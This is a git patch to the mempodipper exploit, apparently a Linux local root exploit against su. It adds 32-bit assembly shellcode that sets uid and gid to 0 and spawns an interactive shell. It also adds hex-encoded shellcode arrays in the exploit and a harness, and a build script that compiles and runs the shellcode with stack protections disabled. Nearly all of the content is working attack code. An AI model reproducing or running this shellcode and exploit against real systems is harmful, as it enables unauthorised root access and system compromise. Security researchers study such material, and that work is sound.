From 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 22 Jan 2012 06:16:39 +0100
Subject: Add 32bit shellcode.

---
 build-and-run-shellcode.sh |  6 ++++++
 harness.c                  |  7 ++++++
 mempodipper.c              | 12 +++++++----
 run-shellcode.sh           |  2 --
 shellcode-32.s             | 53 ++++++++++++++++++++++++++++++++++++++++++++++
 shellcode-64.s             |  4 ++--
 6 files changed, 76 insertions(+), 8 deletions(-)
 create mode 100755 build-and-run-shellcode.sh
 create mode 100644 harness.c
 delete mode 100755 run-shellcode.sh
 create mode 100644 shellcode-32.s

diff --git a/build-and-run-shellcode.sh b/build-and-run-shellcode.sh
new file mode 100755
index 0000000..0a8a34b
--- /dev/null
+++ b/build-and-run-shellcode.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+if [ "$1" == "32" ]; then
+	nasm -o /dev/stdout shellcode-32.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -m32 -fno-stack-protector -z execstack -o harness harness.c && ./harness
+else
+	nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
+fi
diff --git a/harness.c b/harness.c
new file mode 100644
index 0000000..10bf6ce
--- /dev/null
+++ b/harness.c
@@ -0,0 +1,7 @@
+unsigned char buf[] = 
+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+void main() { (*(void(*)())buf)(); }
diff --git a/mempodipper.c b/mempodipper.c
index 1fb8cc2..fb20c26 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -203,24 +203,28 @@ int main(int argc, char **argv)
 		lseek64(fd, offset, SEEK_SET);
 		
 #if defined(__i386__)
-		// Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php
+		// See shellcode-32.s in this package for the source.
 		char shellcode[] =
-			"\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
-			"\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1"
+			"\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+			"\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31"
+			"\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80";
+
 #elif defined(__x86_64__)
+		// See shellcode-64.s in this package for the source.
 		char shellcode[] =
 			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
 			"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
 			"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
 			"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
 			"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+
 #else
 #error "That platform is not supported."
 #endif
 		printf("[+] Executing su with shellcode.\n");
 		execl("/bin/su", "su", shellcode, NULL);
 	} else {
-		sleep(0.01);
 		char pid[32];
 		sprintf(pid, "%d", parent_pid);
 		printf("[+] Executing child from child fork.\n");
diff --git a/run-shellcode.sh b/run-shellcode.sh
deleted file mode 100755
index 5ffcf39..0000000
--- a/run-shellcode.sh
+++ /dev/null
@@ -1,2 +0,0 @@
-#!/bin/sh
-nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-32.s b/shellcode-32.s
new file mode 100644
index 0000000..d08b93f
--- /dev/null
+++ b/shellcode-32.s
@@ -0,0 +1,53 @@
+BITS 32
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor ebx,ebx
+mov al,0x17
+int 0x80
+;setgid(0)
+xor ebx,ebx
+mov al,0x2e
+int 0x80
+;dup2(6, 2)
+mov bl,0x6
+mov cl,0x2
+mov al,0x3f
+int 0x80
+
+
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+xor eax,eax			; eax = 0
+push eax			; push eax
+push 0x68732f6e			; push //bin/sh
+push 0x69622f2f
+mov ebx,esp			; set ebx (arg 1) to top of stack
+
+xor edx,edx			; edx = 0
+mov dx,'-i'			; edx = '-i'
+push edx			; push edx to stack
+mov eax,esp			; set eax to top of stack
+
+xor edx,edx			; edx = 0
+
+; so at this point:
+;	ebx is a pointer to '//bin/sh'
+;	eax is a pointer to '-i'
+;	edx is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push edx			; push edx to stack
+push eax			; push eax to stack
+push ebx			; push ebx to stack
+mov ecx,esp			; set ecx (arg 2) to top of stack
+
+xor edx,edx			; rdx (arg 3) = 0
+
+xor eax,eax
+mov al,0xb			; al = 0x3b, which is the exec call
+int 0x80
diff --git a/shellcode-64.s b/shellcode-64.s
index 2514ed2..f465c5d 100644
--- a/shellcode-64.s
+++ b/shellcode-64.s
@@ -19,13 +19,13 @@ mov sil,0x2
 mov al,0x21
 syscall
 
-; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+; execve("/bin/sh", ["/bin/sh", "-i", 0], 0)
 mov qword rbx,'//bin/sh'	; rbx = //bin/sh
 shr rbx,0x8			; remove leading / from rbx
 push rbx			; push rbx to stack
 mov rdi,rsp			; set rdi (arg 1) to top of stack
 
-xor rbx,rbx
+xor rbx,rbx			; rbx = 0
 mov bx,'-i'			; rbx = '-i'
 push rbx			; push rbx to stack
 mov rcx,rsp			; set rcx to top of stack
-- 
cgit v1.2.3-59-g8ed1b